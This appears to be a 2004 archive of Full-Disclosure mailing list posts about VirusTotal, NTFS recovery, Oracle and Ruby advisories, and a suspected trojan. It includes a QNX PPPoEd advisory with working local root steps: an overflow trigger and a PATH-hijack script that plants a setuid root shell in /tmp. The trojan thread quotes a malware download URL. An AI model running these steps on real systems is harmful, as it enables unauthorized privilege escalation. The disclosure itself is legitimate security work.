Re: [Full-Disclosure] Multi-vendor AV scanning without sending a sample
John LaCour wrote: > > If you don't want to use something like www.virustotal.com to scan > suspected malware, then use the activex web based scanners of > several vendors. It's a bit more time consuming, but then you > don't end up sending anyone your sample. > > Here's a list (a few actually do require you to upload the sample). > If anyone knows of any others, please send me the info. Have a look at the following site - you'll have to scroll down a bit to the "Online Anti-Virus Scanners" section: http://claymania.com/anti-virus.html Regards, Axel Pettinger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: About VirusTotal/Hispasec
Very happy to see your reply Bernardo. =) That's how I imagines VirusTotal.com to be... it's a shame that some people insist on bashing a valid service. I can certainly understand, and appreciate, 2nd guessing something that seems to good to be true. However, instead of bad mouthing it right out of the box, ask the questions first. THEN give the conspiracy theories. =D Best of luck expanding VirusTotal.com. It's an awesome service that has saved me many headaches in times of need. -- Peace. ~G On Fri, 3 Sep 2004 21:11:12 +0200, Bernardo Quintero <[EMAIL PROTECTED]> wrote: > > I'm also rather suspicious of your promotion of Virus Total. Hispasec, > > as far as I can tell (Spanish being something I have to have translated > > via online services), has no antivirus or similar product of its own, > > Obviously, we don't develop any antivirus product. We don't either > distribute any antivirus solution or have interest in any specific AV > vendor. > > > yet it has set up, and some folk seem to be promoting, what is > > effectively a sample collection mechanism. I've also heard vague > > Sincerely, we have no hidden intentions, and we don't have any business > model behind VirusTotal, but we accept suggestions in that field ;) > > VirusTotal is more a system that lets users have a second opinion about > suspicious file that, by any reason or other, are not detected as > 'dangerous' by the AV they have installed in their system. > > The program were developed as an inner-use tool for our laboratory to > keep monitorized update responses of AV engines against new malware, > knowing that way when exactly they started to detect them. > We're requested frequently for consulting about antivirus solutions, and > we've been doing tests and studies in that field for technical magazines > and companies for years. > > Once we had it working in our lab, we thought it would be something > useful for the community for having that second opinion I told you > about. We made it a lovely wrapper (the web interface) and we offered it > as a free service. > > About files received, we've developed a distribution system for giving > that files to AV vendors that don't detect a suppossedly infected file > (or that they detect with heuristics). This system is not active now, > and I hope to make a formal proposal (free) and have consensus with > them to see if they like that system. If we finally activate that system, > VirusTotal will accept new commands so users could choose if they > want that files to be sent to AV vendors or not. > > I don't really see any problem about suspicious binaries, but in in the > case of documents I understand that users should be able to use the > service and make it knowing that file is not going to be sent to any lab > (a matter of privacy). I think the best way is to keep that > 'not-sending' option, so a user can decide anytime when they send a new > file to make it enter the distribution system or not. > > > rumblings that Hispasec/Virus Total does not have suitable licenses for > > at least some of the scanners used in its service (and strongly suspect > > that several of the AV vendors whose products are currently used would > > not allow their products to be licensed for use in a service of the > > No AV engine in VirusTotal is being used againsg the will of their > vendors. We've asked permission to all developers themselves or > distributors of that products here in Spain (just by geographical > reasons, as it is our country). We're planning to increase the number of > engines used (we're working on it) as other AV vendors have asked us to > be part of the project with their solutions. > > >- the different results could be due to differences in the update > > schedule at virustotal.com (some vendors offer their fastest updates > > only for premium licenses, which virustotal may not have). > > VirusTotal is configured to look for new updates of all AVs in the > system every 5 minutes. The updating system is basically the same that a > registered used have in their own system. Obviouslly, AV vendors have > stressed the importance of keep that procedure as pure as possible for > not being 'harmed' against others. > > >- maybe some products are used with optimized settings (for example > > maximum heuristic detection) and others with default settings. > > The parameters used in each engine are discussed with the developers, as > we look for a behaviour as close as possible to the one a user could > experience in their system. > > >Unless for (a purely theretical) example the website would use your > >submission to infect others (perhaps with your address as sender) :-) > > Definitively, that statement is close to paranoia, or there's simply > interest in you to libel the service. Well, next week VirusTotal will > accept files though a form that won't need any email to be given, so you > can obtain the results directly on the web. > > >I believe the intension maybe good
[Full-Disclosure] [RLSA_01-2004] QNX PPPoEd local root vulnerabilities
*** rfdslabs security advisory *** Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004] Versions: QNX RTP 6.1 (possibly others) Vendor: http://www.qnx.com Date: 02 Sep 2004 Author: Julio Cesar Fort 1. Introduction PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX users. More information can be found at QNX Developer Support: www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html There are two vulnerabilities that can lead to local root access. 2. Details #1 Buffer overflow PPPoEd has multiple problems with bounds checking. Almost every flag with oversized length crashes PPPoEd, overwriting memory. Once it is by default suid owned by root, an attacker can execute arbitrary instructions to elevate privi- ledges. Above is an example to cause this overflow. $ export overflow256='AAA(...)' (around 256 A's) $ /usr/bin/pppoed -F $overflow256 Memory fault (core dumped) $ /usr/bin/pppoed service=$overflow256 Memory fault (core dumped) ... And it repeats in 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout', 'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac' flags. #2 Old $PATH trick PPPoEd calls "mount -T io-net npm-pppoe.so" without full path. If someone wants to cheat PPPoEd and tricks it to execute his own malicious code, it can be possible modifying $PATH. With this modification, '/usr/sbin/pppoed' will simple execute 'mount' (hostile code) looking for it at /tmp directory. Simple proof-of-concept steps are above. $ cd /tmp $ cat << _EOF_ > mount #!/bin/sh cp /bin/sh /tmp/rootshell chown root /tmp/rootshell chmod 4777 /tmp/rootshell echo "Here comes your root shell" _EOF_ $ chmod 755 mount $ export PATH=/tmp:$PATH $ /usr/sbin/pppoed $ ls -la /tmp -rwxr-xr-x1 sandimas users 88 Aug 25 2004 mount -rwsrwxrwx1 root 100153384 Jun 22 2001 /tmp/rootshell $ /tmp/rootshell Here comes your root shell # uname -a QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86 # 3. Solution rfdslabs tried to contact QNX Software Systems but no security staff e-mail was found. No solution yet. 4. Timeline 27 Aug 2004: Vulnerabilities detected; 28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success; 02 Sep 2004: Advisory written and sent to security mail-lists. Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs. www.rfdslabs.com.br - computers, sex, humand mind and more Recife, PE, Brazil Message sent using UebiMiau 2.7.2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Restoring a NTFS partition?
sleuthkit and autopsy are your friend... http://www.sleuthkit.org/autopsy/ -KF ASB wrote: It is possible to restore data after a format regardless of the filesystem. This is not an NTFS issue, nor a Windows issue for that matter. -ASB On Sat, 4 Sep 2004 07:38:13 +1000 (EST), Craig Bumpstead <[EMAIL PROTECTED]> wrote: Hi, I have heard that it is possible to restore a NTFS partition even though it has been formatted and software re-installed? Apparently this is because of a flaw/design in NTFS. Does anyone know about this? Cheers, Craig ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
Lollery. On Fri, 3 Sep 2004 08:33:10 -0700 (PDT), the entrepreneur <[EMAIL PROTECTED]> wrote: > James, > A nice manifesto indeed. But it no way does it > correlates to the one which I have written (or > probably modified). Maybe the sarcasm is not > noticeable, maybe you missed it, maybe because we are > different people altogether. > Well, I am here because I am anti-authoritative, a > negated personality (I hate to call it that because > the fundamental idea of it's emergence was this growth > of negative activity, this was root for pete's sake!). > Maybe you supressed your impulses, or are vehementaly > denying it. > Well its snonymous to rap songs, they are violent, > they are bad, but we listen, with that fetish look in > eyes. Maybe you listen to it too or maybe not, but > there always one vantage point where you blow your > steam, about your very inner conscience. > My conscience was the conscinence of this Manifesto, > it manifests, the "hummm..." sound some people will do > when they read it. It's for them. > If not for them, lest it's for me. > EULA might not cover it (how can you miss the pun > there ?), but the First Amendment will. hehe. > > Am I spared? > > -Regards > The Entrepreneur > --- James Tucker <[EMAIL PROTECTED]> wrote: > > > A short piece of food for thought for all you > > hackers out there. This > > is not an attack on your livelihood this is merely a > > point for your > > consideration. > > > > It (the manifesto) does not explain why this > > information is relevant > > for me to read. or maybe I am unable to understand > > the part that does, > > if so please teach this willing student. > > > > Your manifesto seems largely similar to those > > written by many others. > > The attacks upon the security industry (which is > > required, whether the > > techs are good or not is a different matter) are > > largely unqualified. > > Please do not forget that businesses are formed due > > to the needs of > > other businesses or people and they serve others, > > this leads in a > > chain like manner back to the industries you would > > choose not to > > attack. > > > > Tell me how would you feel if you successfully stole > > enough money that > > you crashed an economy and power generation also > > stopped. An unreal > > scenario I know, but tone this back down to reality, > > and you realise > > that the things you are using are also directly > > related to the things > > you are trashing. In essence you are destroying your > > own world. > > > > It is business that makes computers, it is power > > that feeds the > > factories, it is these peoples money that pays the > > employees. The > > employees need health insurance if they want to > > survive, hospitals > > need their equipment, which in turn requires design, > > logistics for > > movement of physical items. The logistics companies > > need ISP's for > > their communications infrastructure, and banks to > > manage their money. > > The trail goes on. Do you not realise that many of > > the places you > > attack are merely part of the chain of business > > which supports the > > world that you love? > > > > A final point to further this, how far are you > > willing to go in > > causing people inconvenience? Every day people > > commit suicide due to > > stress caused to them in their business lives. > > Shutting down > > communications media, or any other business could > > have this effect (or > > at least contribute). Even furthermore there are > > situations where your > > actions may more directly affect the safety of > > individuals. Continuing > > to do so may then be compared to attempted murder. > > Still think you > > have any moral high ground? > > > > Finally the word manifesto means "a declaration of > > intent". I was > > unable to see any intended actions stated. In fact > > what I read more > > resembled a boast of money gained by actions already > > performed, and > > insult of lesser hackers and security professionals. > > For someone who > > should have a clear understanding of the need for > > accurate > > understanding of language (most important when the > > language is dealt > > with on a purely logical and explicit basis as with > > a computer system) > > you seem to not care so much about the accuracy of > > your written > > language. > > > > --- > > > > I am a student of security and this is my manifesto. > > I intend to have > > any hacker who tries to attack me for trying to > > provide an explanation > > of my point of view to them, thrown into jail for > > the longest sentence > > available under the laws of the country in which > > they committed their > > crime. This is my statement of intent, my manifesto, > > and it needs no > > end user license agreement or copyright. It is not > > unreasonable, it is > > not a declaration of war, it is a statement > > accompanying a point for > > discussion, nothing more. > > > > What do you think? > > > > > > On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the > >
Re: [Full-Disclosure] Restoring a NTFS partition?
It is possible to restore data after a format regardless of the filesystem. This is not an NTFS issue, nor a Windows issue for that matter. -ASB On Sat, 4 Sep 2004 07:38:13 +1000 (EST), Craig Bumpstead <[EMAIL PROTECTED]> wrote: > Hi, > > I have heard that it is possible to restore a NTFS > partition even though it has been formatted and > software re-installed? > Apparently this is because of a flaw/design in NTFS. > > Does anyone know about this? > > Cheers, > Craig ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server
Most of the vulns are almost one year old. We don't steal anything. BTW: finding vulns in Oracle products is like fishing in a pool full of fishes. Not big deal. Cesar. --- xbud <[EMAIL PROTECTED]> wrote: > Actually this sounds like someone stole Litchfield's > research - but what do I > know. Just seems like too much coincidence since > his last talk dealt with > procedure based vulns. > > __ Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Restoring a NTFS partition?
Hi, I have heard that it is possible to restore a NTFS partition even though it has been formatted and software re-installed? Apparently this is because of a flaw/design in NTFS. Does anyone know about this? Cheers, Craig Find local movie times and trailers on Yahoo! Movies. http://au.movies.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
SV: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server
Hi, >Actually this sounds like someone stole Litchfield's research - >but what do I >know. Just seems like too much coincidence since his last talk dealt with >procedure based vulns. No, these are separate issues. This is a coordinated update that fixes multiple vulnerabilities in Oracle. Details from NGSSoftware won't be disclosed until after 3 months. However, the advisory publiced by Application Security Inc. contains sufficient data that could be abused to start exploiting Oracle databases immediately. Kind regards Peter Kruse http://www.csis.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server
Actually this sounds like someone stole Litchfield's research - but what do I know. Just seems like too much coincidence since his last talk dealt with procedure based vulns. On Thursday 02 September 2004 08:32 am, Mark Shirley wrote: > Now that's what i've been waiting for :) > > On Wed, 01 Sep 2004 19:20:25 -0400, SHATTER <[EMAIL PROTECTED]> wrote: > > AppSecInc Advisory: Multiple vulnerabilities in Oracle Database Server > > > > Date: > > August 31, 2004 > > > > Detailed Information Provided Online At: > > http://www.appsecinc.com/resources/alerts/oracle/2004-0001/ > > > > Credit: > > These vulnerabilities were researched and discovered by Cesar Cerrudo > > and Esteban Martinez Fayo of Application Security, Inc. > > (www.appsecinc.com) > > > > Risk Level: > > High > > > > Abstract: > > Multiple buffer overflow and denial of service (DoS) vulnerabilities > > exist in the Oracle Database Server which allow database users to take > > complete control over the database and optionally cause denial of > > service. > > > > The official advisory from Oracle Corporation can be obtained from: > > http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf > > > > Details: > > > > http://www.appsecinc.com/resources/alerts/oracle/2004-0001/ > > > > #1 - Buffer overflow in public procedure DROP_SITE_INSTANTIATION of > > DBMS_REPCAT_INSTANTIATE package > > > > #2 - Buffer overflow in public function INSTANTIATE_OFFLINE of > > DBMS_REPCAT_INSTANTIATE package > > > > #3 - Buffer overflow in public function INSTANTIATE_ONLINE of > > DBMS_REPCAT_INSTANTIATE package > > > > #4 - Buffer overflow on "gname" parameter on procedures of Replication > > Management API Packages > > > > #5 - Buffer overflow on "sname" and "oname" parameters on procedures of > > DBMS_REPCAT package > > > > #6 - Buffer overflow on "type" parameter on procedures of DBMS_REPCAT > > package > > > > #7 - Buffer overflow on "gowner" parameter on procedures of the > > DBMS_REPCAT package > > > > #8 - Buffer overflow on "operation" parameter on procedures of > > DBMS_REPCAT package > > > > #9 - Buffer overflow in procedure CREATE_MVIEW_REPGROUP of DBMS_REPCAT > > package > > > > #10 - Buffer overflow in procedure GENERATE_REPLICATION_SUPPORT of > > DBMS_REPCAT package > > > > #11 - Buffer overflow in procedures REGISTER_USER_REPGROUP and > > UNREGISTER_USER_REPGROUP of DBMS_REPCAT_ADMIN package > > > > #12 - Buffer overflow in functions INSTANTIATE_OFFLINE, > > INSTANTIATE_ONLINE and procedure DROP_SITE_INSTANTIATION of > > DBMS_REPCAT_RGT package > > > > #13 - Buffer overflow on TEMPFILE parameter > > > > #14 - Buffer overflow on LOGFILE parameter > > > > #15 - Buffer overflow on CONTROLFILE parameter > > > > #16 - Buffer overflow on FILE parameter > > > > #17 - Buffer overflow in Interval Conversion Functions > > > > #18 - Buffer overflow in String Conversion Function > > > > #19 - Buffer overflow in CTX_OUTPUT Package Function > > > > #21 - Buffer overflow on DATAFILE parameter > > > > #22 - Buffer overflow in DBMS_SYSTEM package function > > > > #24 - Buffer overflow on "fname" parameter of the DBMS_REPCAT* packages > > > > #25 - Buffer overflow on procedures of the Replication Management API > > packages > > > > #26 - Heap based buffer overflow Vulnerability in Oracle 10g iSQL*PLus > > Service > > > > #27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of > > DBMS_AQ_IMPORT_INTERNAL package > > > > #28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of > > DBMS_AQADM package > > > > #29 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_NO_QUEUE of > > DBMS_AQADM package > > > > #30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS > > package > > > > #31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of > > DBMS_DEFER_INTERNAL_SYS package > > > > #32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of > > DBMS_DEFER_REPCAT package > > > > #33 - Buffer overflow in procedure DISABLE_RECEIVER_TRACE of > > DBMS_INTERNAL_REPCAT package > > > > #34 - Buffer overflow in procedure ENABLE_RECEIVER_TRACE of > > DBMS_INTERNAL_REPCAT package > > > > #35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT > > package > > > > #36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF > > package > > > > #37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package > > > > #39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package > > > > #40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package > > > > #41 - Buffer overflow in public procedure SDO_CODE_SIZE of MD2 package > > > > #42 - Buffer overflow in public procedure VALIDATE_GEOM of MD2 package > > > > #43 - Buffer overflow in public procedure SDO_CODE_SIZE of SDO_ADMIN > > package > > > > #44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package > > > > To determine if you are vulnerable, please download AppDetective from: > > > > http://www.appsecinc.com/products/appdetectiv
Re: [Full-Disclosure] Where to submit a suspected trojan or virus?
Harlan Carvey wrote: The fact that there's a copy of this Explorer.exe in System32 may be an issue. Was there an application running? Was there a Registry entry related to this file? If so, which one? How about another autostart location? What do you mean by "I believe take precedence over the real explorer.exe"? how so? Well, actually I discovered it, using autoruns from sysinternals. The registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell had simply the value "Explorer.exe" and autoruns showed as the image path: "c:\windows\system32\explorer.exe" Autoruns also showed the icon of the file and it was the wrong icon, it had the icon of internet explorer not explorer. This led me to search for the real explorer.exe and google confirmed that the right location is c:\windows. Once deleted the fake explorer.exe from system32 autoruns showed the right image path and the right icon. Today I sent it to kaspersky lab and they said it's a simple trojan-downloader. I think that the fake explorer.exe call the real one after having downloaded his trojan. The problem now is that the file it downloads is no more avalaible (it was at "http://www.getupdate.com/TestDownload.exe";) and I can't tell if I have downloaded it and in such case what does it do... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
I'm Rick James bitch! -KF Adam wrote: who are you friggen Dr Evil? On Friday 13 August 2004 07:04 pm, KF_lists wrote: Insert subject here ^ -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Finger Google v1.0 released
Hi, Finger Google v1.0 is a very simple tools, but as many of my friends ask me to post it, so I've done it. This tool searchs recursively in google for mail account and gives you them in user list format. This is somekind usefull when pen-testing and you want to get account names passively. I hope you enjoy it. http://hack3rs.org/~shadown/Twister Cheers. -- Sergio Alvarez Security, Research & Development IT Security Consultant email: [EMAIL PROTECTED] This message is confidential. It may also contain information that is privileged or otherwise legally exempt from disclosure. If you have received it by mistake please let us know by e-mail immediately and delete it from your system; should also not copy the message nor disclose its contents to anyone. Many thanks. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 who are you friggen Dr Evil? On Friday 13 August 2004 07:04 pm, KF_lists wrote: > Insert subject here ^ > > -KF > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBHsvzQEDQWvlbVLkRAls1AJ9il79zClgYJinxFJrZFILdbw6v7QCeLhQa 12Xv/+oYjPxty8GdJmRqGHw= =kKb6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Security & Obscurity: physical-world analogies
On Fri, Sep 03, 2004 at 08:06:49AM -0500, Frank Knobbe ([EMAIL PROTECTED]) wrote: > On Fri, 2004-09-03 at 03:04, [EMAIL PROTECTED] wrote: > > > Feel free to play through the same scenario with a wall where "dead" > > > people-packets get purposefully deployed in front of the wall until the > > > last people-packet can climb the packet mountain and pass over the wall. > > > > Unfortunately, this tactic has been used in warfare. It has been referred > > to as the "human wave" attack. :-( > > But it as a bunch of different people packets. In cyber space it is the > copy of one. In the real world you might exhaust your people-packet > resources, in cyber space you don't. :) > > No we're leading discussion down a wrong path again due to a flawed > analogy :) When I put on my 'purist' hat I agree with your extreme position regarding analogies. Even without the hat I agree when the subject matter becomes advanced and specific. OTOH, if a person were to take this purist position and walk into a CEO's office and tell him that he is not smart enough to understand and should therefore give free rein. That person is going to walk back out the door looking for a new gig because they will not be working there. It has been my experience to 1) never talk down to the audience and 2) stay away from analogies with loads of baggage because it leads them to falsely think that they have gained deep insight. An example from physics would be Einstein's clock tower thought experiment. A familar setting (without heavy emotional baggage) but the whole experiment takes place orthogonally to that setting (on a train). Then there is the cat in a box and raisins in oatmeal and we are still talking about the same realm. We have an entire century as example where phyicists worked with the invisible through analogy. In the end, the claim analogies can not be used is to admit a poverty of creativity. "We can not explain this to you because we are not bright enough to think of a good set of analogies." Ouch. -- Chief Gadgeteer Elegant Innovations ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] About VirusTotal/Hispasec
> I'm also rather suspicious of your promotion of Virus Total. Hispasec, > as far as I can tell (Spanish being something I have to have translated > via online services), has no antivirus or similar product of its own, Obviously, we don't develop any antivirus product. We don't either distribute any antivirus solution or have interest in any specific AV vendor. > yet it has set up, and some folk seem to be promoting, what is > effectively a sample collection mechanism. I've also heard vague Sincerely, we have no hidden intentions, and we don't have any business model behind VirusTotal, but we accept suggestions in that field ;) VirusTotal is more a system that lets users have a second opinion about suspicious file that, by any reason or other, are not detected as 'dangerous' by the AV they have installed in their system. The program were developed as an inner-use tool for our laboratory to keep monitorized update responses of AV engines against new malware, knowing that way when exactly they started to detect them. We're requested frequently for consulting about antivirus solutions, and we've been doing tests and studies in that field for technical magazines and companies for years. Once we had it working in our lab, we thought it would be something useful for the community for having that second opinion I told you about. We made it a lovely wrapper (the web interface) and we offered it as a free service. About files received, we've developed a distribution system for giving that files to AV vendors that don't detect a suppossedly infected file (or that they detect with heuristics). This system is not active now, and I hope to make a formal proposal (free) and have consensus with them to see if they like that system. If we finally activate that system, VirusTotal will accept new commands so users could choose if they want that files to be sent to AV vendors or not. I don't really see any problem about suspicious binaries, but in in the case of documents I understand that users should be able to use the service and make it knowing that file is not going to be sent to any lab (a matter of privacy). I think the best way is to keep that 'not-sending' option, so a user can decide anytime when they send a new file to make it enter the distribution system or not. > rumblings that Hispasec/Virus Total does not have suitable licenses for > at least some of the scanners used in its service (and strongly suspect > that several of the AV vendors whose products are currently used would > not allow their products to be licensed for use in a service of the No AV engine in VirusTotal is being used againsg the will of their vendors. We've asked permission to all developers themselves or distributors of that products here in Spain (just by geographical reasons, as it is our country). We're planning to increase the number of engines used (we're working on it) as other AV vendors have asked us to be part of the project with their solutions. >- the different results could be due to differences in the update > schedule at virustotal.com (some vendors offer their fastest updates > only for premium licenses, which virustotal may not have). VirusTotal is configured to look for new updates of all AVs in the system every 5 minutes. The updating system is basically the same that a registered used have in their own system. Obviouslly, AV vendors have stressed the importance of keep that procedure as pure as possible for not being 'harmed' against others. >- maybe some products are used with optimized settings (for example > maximum heuristic detection) and others with default settings. The parameters used in each engine are discussed with the developers, as we look for a behaviour as close as possible to the one a user could experience in their system. >Unless for (a purely theretical) example the website would use your >submission to infect others (perhaps with your address as sender) :-) Definitively, that statement is close to paranoia, or there's simply interest in you to libel the service. Well, next week VirusTotal will accept files though a form that won't need any email to be given, so you can obtain the results directly on the web. >I believe the intension maybe good but I have some lingering >suspicion of *free* service that have you send in binary maybe >the elaborate works of vx traders. (cue the conspiracy theories) Obviously not. Do you have any other suspicion or vague rumour? I think this kind of things can make people of the list get bored, so you can use the email we offer ([EMAIL PROTECTED]) for answering all kind of requests (it's only a suggestion). With time, and using the most usual questions and answers received through that email, we're going to publish a FAQ in the site itself. Of course, all critics and sugerences are welcome so we can improve the service or include new features. Thanks, Bernardo Quintero [EMAIL PROTECTED] Hispasec
RE: [Full-Disclosure] Where to submit a suspected trojan or virus?
[EMAIL PROTECTED] Add trojan to zip file and send away. Nothing accepted over 1mb. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of John LaCour Sent: Friday, September 03, 2004 1:32 PM To: Scenobro; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Where to submit a suspected trojan or virus? Here's my list of vendor submission addresses, many of which initially came from Nick Fitzgerald. [EMAIL PROTECTED] avsubmit.symantec.com [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Most of these want you to send it in a password protected zip file with a password 'infected'. Some of them want the password to be 'virus'. I tend to just send two zip files to everyone on my distribution list. If anyone knows of any others, I'd appreciate the info. -John > -Original Message- > From: Scenobro [mailto:[EMAIL PROTECTED] > Sent: Thursday, September 02, 2004 9:00 PM > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] Where to submit a suspected trojan > or virus? > > > I found an explorer.exe in my system32 folder which I believe take > precedence over the real explorer.exe located in c:\windows. > It's a 92K file that seems to be a visual basic program. Among the > strings contained in it there is a "C:\TestDL.exe" which I > didn't find > on my disk and a url > "http://www.getupdate.com/TestDownload.exe"; which > does't exists. (the home page of that site is a textfile > containing only > "SB2"). > I sent the file to virustotal.com and they found nothing. > Where I can send this file for analysis? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Where to submit a suspected trojan or virus?
Hi Scenobro, I've had success sending the file to McAfefe's AVERT WebImmune (http://www.webimmunite.net). You can register as a new user and submit through the web interface, or you can simply e-mail the file to [EMAIL PROTECTED] I'd recommend registering as they will provide you with the scan result immediately. Additionally, if you use McAfee, they will provide you with updated virus definition files to clean the machine. Best of luck, Pat -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kyle Maxwell Sent: Friday, September 03, 2004 12:23 PM To: Scenobro Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Where to submit a suspected trojan or virus? On Fri, 03 Sep 2004 06:00:27 +0200, Scenobro <[EMAIL PROTECTED]> wrote: > I found an explorer.exe in my system32 folder which I believe take > precedence over the real explorer.exe located in c:\windows. > It's a 92K file that seems to be a visual basic program. Among the > strings contained in it there is a "C:\TestDL.exe" which I didn't find > on my disk and a url "http://www.getupdate.com/TestDownload.exe"; which > does't exists. (the home page of that site is a textfile containing > only "SB2"). > I sent the file to virustotal.com and they found nothing. > Where I can send this file for analysis? The Internet Storm Center also has a malware analysis group, and they coordinate with the major AV vendors; you can submit the file and relevant information at http://isc.sans.org/contact.php or via email to [EMAIL PROTECTED] (I think). -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200409-08 ] Ruby: CGI::Session creates files insecurely
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200409-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Ruby: CGI::Session creates files insecurely Date: September 03, 2004 Bugs: #60525 ID: 200409-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis When used for CGI scripting, Ruby creates session files in /tmp with the permissions of the default umask. Depending on that umask, local users may be able to read sensitive data stored in session files. Background == Ruby is an Object Oriented, interpreted scripting language used for many system scripting tasks. It can also be used for CGI web applications. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 dev-lang/ruby < 1.8.2_pre2 *>= 1.6.8-r11 *>= 1.8.0-r7 >= 1.8.2_pre2 Description === The CGI::Session::FileStore implementation (and presumably CGI::Session::PStore), which allow data associated with a particular Session instance to be written to a file, writes to a file in /tmp with no regard for secure permissions. As a result, the file is left with whatever the default umask permissions are, which commonly would allow other local users to read the data from that session file. Impact == Depending on the default umask, any data stored using these methods could be read by other users on the system. Workaround == By changing the default umask on the system to not permit read access to other users (e.g. 0700), one can prevent these files from being readable by other users. Resolution == All Ruby users should upgrade to the latest version: # emerge sync # emerge -pv ">=dev-lang/ruby-your_version" # emerge ">=dev-lang/ruby-your_version" References == [ 1 ] CAN-2004-0755 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0755 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200409-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) 